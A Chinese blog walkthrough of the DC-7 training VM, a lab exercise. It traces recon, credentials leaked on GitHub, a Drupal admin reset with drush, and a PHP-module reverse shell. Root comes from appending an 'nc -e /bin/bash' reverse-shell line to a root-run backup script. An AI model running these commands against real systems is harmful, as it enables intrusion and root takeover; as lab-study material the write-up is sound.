官方公众号企业安全新浪微博
FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。
FreeBuf+小程序
DC系列靶机丨DC7
小白学安全- 关注
0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9
DC系列靶机丨DC7
本文由
小白学安全 创作,已纳入「FreeBuf原创奖励计划」,未授权禁止转载
信息收集
确定IP地址
netdiscover -i eth0 -r 192.168.84.0/24
扫描端口
nmap 漏洞扫描
WEB测试
基于网站的信息收集
最终在github上面发现代码泄露
https://github.com/Dc7User/staffdb
在config.php文件中发现账户与密码
经测试,可登录ssh
在当前目录下有一个mbox文件
调用了这个脚本
查看当前目录下的文件,backups里面有两个加密文件,不可利用,查看mbox文件,发现是一个计划任务 自动备份数据库的执行情况,调用的脚本是/opt/scripts/backups.sh,是root权限执行的
注意:drush是专门用来管理Drupal站点的shell,可以用来修改密码
故修改站点密码
先进入网站所在的目录
通过以下命令发现管理员账号admin
drush user-information admin
修改admin账户的密码
drush upwd admin --password="passwd"
以当前的账户密码登录网站后台
写入反弹shell
该位置可以编写文章,但是没有php形式
安装支持php语言的插件
插件链接:https://ftp.drupal.org/files/projects/php-8.x-1.x-dev.tar.gz
安装成功
提示:如果报错,则重新安装即可
回到模块中,勾选php安装,安装完成后在内容编辑的地方出现了PHP code
在该页面写入反弹shell【网上随便找下即可】
本地开启监听状态
提权
获取标准的终端
python -c "import pty;pty.spawn('/bin/bash')"
利用定时任务提权
追加一个反弹shell到定时任务中,即可
echo "nc -e /bin/bash 192.168.84.174 5555" >> /opt/scripts/backups.sh
本地监听5555端口,等待backups.sh文件定时执行root权限就好了
获取标准的终端
python -c "import pty;pty.spawn('/bin/bash')"
flag
免责声明
1.一般免责声明:本文所提供的技术信息仅供参考,不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》,作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。
2. 适用性声明:文中技术内容可能不适用于所有情况或系统,在实际应用前请充分测试和评估。若因使用不当造成的任何问题,相关方不承担责任。
3. 更新声明:技术发展迅速,文章内容可能存在滞后性。读者需自行判断信息的时效性,因依据过时内容产生的后果,作者及发布平台不承担责任。
小白学安全
微信公众号关注【小白学安全】 一一一一 xbxaq.com
已在FreeBuf发表 9 篇文章
本文为 小白学安全 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
小白学安全 LV.4
微信公众号关注【小白学安全】 一一一一 xbxaq.com
- 9 文章数
- 5 关注者
DC系列靶机丨DC9
2023-01-26
DC系列靶机丨DC8
2023-01-26
DC系列靶机丨DC6
2023-01-26
文章目录